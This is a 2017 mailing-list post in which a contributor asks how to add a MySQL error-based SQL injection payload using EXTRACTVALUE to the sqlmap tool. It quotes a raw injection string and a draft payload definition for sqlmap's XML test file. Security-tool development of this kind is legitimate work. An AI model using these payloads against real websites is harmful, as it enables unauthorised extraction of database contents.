[sqlmap-users] help implement new payload for error based sqli using extractvalue()
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] help implement new payload for error based sqli using extractvalue()
|
From: daniel <ana...@pr...> - 2017-02-14 01:09:13
|
Hi all.. first time send e-mail to list =)
My name is daniel, i'm new on contributing to the project..
I trying to implement this kind of payload to the error-based method for mysql, but i'm having some problems..
The payload i want to implement is:
file.php?id=1 and extractvalue(0x0a,concat(0x0a,(query)))--+
I know that 0x0a is the "ENTER" but it can be changed for other chars.. so i replace it for ':' .. that would be 0x3a
I found the error_based.xml file, and i try some modifications but it keeps don't getting the expected results.. I'm trying like this:
<test>
<title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXTRACTVALUE(':',CONCAT(':',([QUERY])))</vector>
<request>
<!-- These work as good as ELT(), but are longer
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload>and extractvalue(0x3a,concat(':',(select '[DELIMITER_STOP]')))</payload>
</request>
<response>
<grep>':'(?P<result>.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>>= 5.1</dbms_version>
</details>
</test>
And i want to don't test for WHERE, HAVING or ORDER BY... just with AND..
Sorry my bad english hope you could understand =)
best regards,
daniel.
github.com/chr0n1c
Sent from [ProtonMail](https://protonmail.com), Swiss-based encrypted email. |